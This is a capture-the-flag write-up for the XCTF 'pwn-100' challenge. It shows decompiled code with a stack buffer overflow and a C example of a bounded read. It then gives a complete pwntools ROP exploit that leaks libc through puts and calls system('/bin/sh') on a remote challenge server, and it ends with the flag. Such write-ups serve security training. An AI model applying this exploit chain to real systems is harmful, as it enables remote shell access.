pwn-100
CTF/XCTF 2021. 2. 11. 02:52

    Disassembly


    undefined8 main()
    {
        setbuf(_reloc.stdin, 0);
        setbuf(_reloc.stdout, 0);
        do();
        return 0;
    }
    void do()
    {
        int64_t var_40h; // rbp-0x40
        
        _read(&var_40h, 200);
        puts("bye~");
        return;
    }
    void _read(void *addr, undefined8 size)
    {
        for(int i=0; i<size; i++){
        	read(0, addr+i, 1);
        }
        return;
    }

    do() calls _read() to read 200 bytes into the buffer at rbp-0x40, so a stack buffer overflow occurs.
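    As an added example (not the writeup's code), the decompiled _read()/do() pattern above beside a bounded replacement in C: overflow_bytes() quantifies how far a 200-byte read spills past the 0x40-byte buffer, read_bounded() is the hardened variant, and feed_bounded() with its pipe is constructed only for offline checking.

```c
/* Constructed example: mirrors the page's _read()/do() parameters
 * (buffer at rbp-0x40, 200 bytes requested); everything else is assumed. */
#include <stddef.h>
#include <string.h>
#include <unistd.h>

#define BUF_SIZE 0x40   /* local buffer: rbp-0x40 in do() */
#define READ_LEN 200    /* length do() passes to _read() */

/* Bytes written past the end of a buf_size buffer when read_len bytes are
 * accepted unconditionally, as the page's _read() does. In this frame the
 * saved rbp sits at +0x40 and the return address at +0x48, so any result
 * greater than 8 means the return address is overwritten. */
size_t overflow_bytes(size_t buf_size, size_t read_len)
{
    return read_len > buf_size ? read_len - buf_size : 0;
}

/* Bounded replacement for _read(): reads at most want bytes, but never more
 * than cap-1, one byte at a time like the original, and NUL-terminates.
 * Returns bytes stored, or -1 on read error. */
ssize_t read_bounded(int fd, char *buf, size_t cap, size_t want)
{
    if (cap == 0) return -1;
    size_t limit = want < cap - 1 ? want : cap - 1;
    size_t n = 0;
    while (n < limit) {
        ssize_t r = read(fd, buf + n, 1);
        if (r < 0) return -1;
        if (r == 0) break;          /* EOF: stop early, keep what we have */
        n++;
    }
    buf[n] = '\0';
    return (ssize_t)n;
}

/* Feeds a constructed input through a pipe into read_bounded() with the
 * binary's parameters (cap = BUF_SIZE, want = READ_LEN) and returns how
 * many bytes landed in out, so the cap can be verified without the binary. */
ssize_t feed_bounded(const char *input, size_t len, char *out)
{
    int fds[2];
    if (pipe(fds) != 0) return -1;
    ssize_t w = write(fds[1], input, len);
    close(fds[1]);
    ssize_t n = (w == (ssize_t)len)
                ? read_bounded(fds[0], out, BUF_SIZE, READ_LEN) : -1;
    close(fds[0]);
    return n;
}
```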

    Return Oriented Programming


    Using puts to determine the library version (and thus the libc base), then calling system("/bin/sh"), solves the challenge.


    Code

    from pwn import *
    
    binary = "./pwn-100"
    lib = "../../lib/libc6_2.23-0ubuntu11_amd64.so"
    server = "111.200.241.244"
    port = 56580
    
    # context.log_level = 'debug'
    context.binary = binary
    
    if True:
    	p = remote(server, port)
    else:
    	p = gdb.debug([binary], gdbscript = 'set debug-file-directory ./x86_64-linux-gnu')
    
    e = ELF(binary)
    r = ROP(e)
    l = ELF(lib)
    
    e.checksec()
    
    prdi = r.find_gadget(['pop rdi', 'ret'])[0]
    
    puts_plt = e.plt["puts"]
    puts_got = e.got["puts"]
    setbuf_got = e.got["setbuf"]
    do = 0x40068e
    
    payload = b"\x90"*0x48
    payload += p64(prdi)
    payload += p64(puts_got)
    payload += p64(puts_plt)
    payload += p64(do)
    payload += b"\x90"*(200-len(payload))
    
    p.send(payload)
    
    p.recvline()
    puts = u64(p.recvline().strip().ljust(8, b"\x00"))
    libc = puts - l.symbols["puts"]
    
    log.info("libc : " + hex(libc))
    
    binsh = libc + next(l.search(b"/bin/sh\x00"))
    system = libc + l.symbols["system"]
    
    payload = b"\x90"*0x48
    payload += p64(prdi)
    payload += p64(binsh)
    payload += p64(system)
    payload += b"\x90"*(200-len(payload))
    
    p.send(payload)
    
    p.interactive()

    Flag

    cyberpeace{e8a8c2e39962c4cd00fde674e17d6886}
